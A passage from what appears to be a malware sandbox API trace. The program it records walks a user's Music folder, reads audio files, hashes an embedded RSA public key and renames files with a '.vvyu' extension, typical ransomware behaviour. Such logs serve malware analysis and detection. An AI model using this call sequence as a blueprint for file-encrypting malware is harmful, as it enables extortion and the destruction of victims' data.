(lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.068] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.068] CloseHandle (hObject=0x52c) returned 1 [0197.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2c84da8 [0197.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0197.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0197.070] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\cYVyaoVP6_8ikj.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\cyvyaovp6_8ikj.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\cYVyaoVP6_8ikj.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\cyvyaovp6_8ikj.m4a.vvyu")) returned 1 [0197.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.073] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.078] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7101a0b0, ftCreationTime.dwHighDateTime=0x1d8a4a9, ftLastAccessTime.dwLowDateTime=0x6819bd10, ftLastAccessTime.dwHighDateTime=0x1d8a59f, ftLastWriteTime.dwLowDateTime=0x6819bd10, ftLastWriteTime.dwHighDateTime=0x1d8a59f, nFileSizeHigh=0x0, nFileSizeLow=0xfe4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D1e2c5.wav", cAlternateFileName="")) returned 1 [0197.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.078] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\D1e2c5.wav") returned=".wav" [0197.079] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\D1e2c5.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\d1e2c5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.079] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=65102) returned 1 [0197.079] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.082] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xfe28, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.083] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.085] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.085] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xfe4e, lpOverlapped=0x0) returned 1 [0197.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.086] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.086] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.088] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.088] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.088] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.088] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.088] GetLastError () returned 0x0 [0197.088] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.088] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.088] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.088] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.088] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfe50) returned 0x2d4f778 [0197.089] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d0d0 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0197.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d118 [0197.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0197.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0197.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a378 [0197.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.090] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a378 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a360 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.095] GetCurrentThreadId () returned 0x264 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4b8b0 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.096] GetCurrentThreadId () returned 0x264 [0197.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a360 [0197.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a378 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3d8 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a390 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3f0 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a390 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3a8 | out: hHeap=0x6a0000) returned 1 [0197.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a360 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3c0 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a390 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0197.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0197.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d118 | out: hHeap=0x6a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.107] HeapFree (in: hHeap=0x6a0000, 